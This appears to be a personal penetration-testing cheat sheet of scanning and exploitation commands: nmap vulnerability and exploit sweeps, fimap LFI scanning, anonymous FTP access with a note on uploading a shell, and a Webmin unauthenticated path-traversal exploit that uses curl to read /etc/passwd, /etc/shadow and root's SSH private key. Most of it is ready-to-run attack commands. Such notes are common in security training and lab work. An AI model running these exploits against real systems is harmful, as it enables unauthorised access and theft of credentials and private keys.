Scan vulnerabilities

Goals

• Scan vulnerabilities from open ports and public services

Search Google for software name

• To search by images for initial ideas of attacked software

Scan using nmapAutomator

• https://github.com/lethanhtung01011980/Notes/wiki/nmapAutomator

Scan all vuln

• nmap -v --script=vuln victim-ip -T4

Scan all exploits

• nmap -v --script exploit -Pn x.x.x.1-254 -oG exploit-sweep.txt
• nmap -Pn -n -sV --script vuln victim_ip ===> Read the OS version, too.

Scan SMB vulnerabilities

• nmap -p 139,445 --script=vuln victim_ip
• nmap -v $ip --script smb-os-discovery.nse

Scan LFI for PHP

• git clone https://github.com/kurobeats/fimap
• ./fimap.py -H -u 'http://x.x.x.71' -d 3 -w /tmp/urllist
• ./fimap.py -m -l /tmp/urllist

Scan LFI for webmin

Attack ref:

• http://scx020c07c.blogspot.com/2012/09/privilege-escalation-pwnos.html
• https://github.com/jas502n/CVE-2019-15107/blob/master/CVE-2019-15107.gif

File disclosure

• 5 times: curl http://victim_ip:10000/unauthenticated/..%01/..%01/..%01/..%01/..%01/etc/passwd

• 40 times: curl http://victim_ip:10000//unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/passwd

• curl http://victim_ip:10000//unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/shadow

• curl http://victim_ip:10000//unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/root/.ssh/id_rsa.pub

• curl http://victim_ip:10000//unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/root/.ssh/id_rsa

Scan RFI

• nmap -Pn -n -sV -p80 --script http-rfi-spider.nse victim_ip

Ref:

• https://www.exploit-db.com/exploits/2017
• perl webmin.pl victim_ip 10000 /etc/passwd 0

Scan for webmin

• nmap -p 10000 10.11.1.1-254 -oG webmin-sweep.txt
• grep open webmin-sweep.txt | cut -d" " -f2

To scan for FTP with backdoor

• ftp-proftpd-backdoor.nse
• ftp-vsftpd-backdoor.nse
• ftp-vuln-cve2010-4221.nse

Scan for anonymous FTP

• nmap -v -p 21 --script=ftp-anon.nse 10.11.1.1-254 -oG anon-ftp-sweep.txt
• grep open anon-ftp-sweep.txt | cut -d" " -f2
• ftp $ip ==> Username: anonymous ==> Password: blank
• FTP command line: https://tecadmin.net/download-upload-files-using-ftp-command-line/ and https://www.cs.colostate.edu/helpdocs/ftp.html
• ftp -p $ip => Passive mode
• ftp> ls
• ftp> cd uploads
• ftp> binary MUST CHANGE TO BINARY TO UPLOAD SHELL
• ftp> put index.html
• ftp> delete index.html
• ftp> get index.html

Check SMTP name and version

• nc victim_ip 25